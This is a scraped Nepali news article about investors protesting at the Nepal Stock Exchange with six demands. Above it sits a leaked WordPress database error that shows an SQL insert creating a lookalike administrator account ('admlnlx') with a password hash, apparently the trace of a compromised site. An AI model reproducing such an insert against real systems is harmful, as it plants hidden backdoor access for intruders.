WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bu30johhd380czpwFEn105v8gTydxr/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 23:09:22', '', 'admlnlx', 'admlnlx')
काठमाडाँ,पुस १३ –
नेपाल स्टक एक्सचेन्जको प्रांगणमा बुधवार विहान १०:३० बजेदेखि १२ बजेसम्म लगानीकर्ताहरुले धर्ना दिएका छन् । बिभिन्न ६ बुँदे माग राख्दै नयाँ सेयर लगानीकर्ता संघले आयोजना गरेको धर्ना कार्यक्रममा अन्य लगानीकर्ताहरुको पनि उपस्थिती रहेको थियो ।
‘हामीले हाम्रा मागका विषयमा आइतवारसम्ममा नेप्सेका धारणा माग गरेका छौं, त्यसपछि आउने जवाफको आधारमा अन्य कार्यक्रम तय गर्नेछौं,’ सेयर लगानीकर्ता संघका अध्यक्ष उत्तम अर्यालले भने संघले विहीवार धितोपत्र बोर्डमा पनि धर्नाको कार्याक्रम तय गरेको अर्यालले जानकारी दिए । संघले वाणिज्य बैंकलाई ब्रोकर लाइसेन्स दिनुपर्ने, ब्रोकर कम्पनीको विस्तार गर्नुपर्ने, अनलाइन ट्रेडिङको व्यवस्था हुनुपर्ने, गैर आवासीय नेपालीलाई बजारमा प्रवेशको वातावरण बनाउनु पर्ने लगायतका ६ बुँदे माग राखेका हुन् ।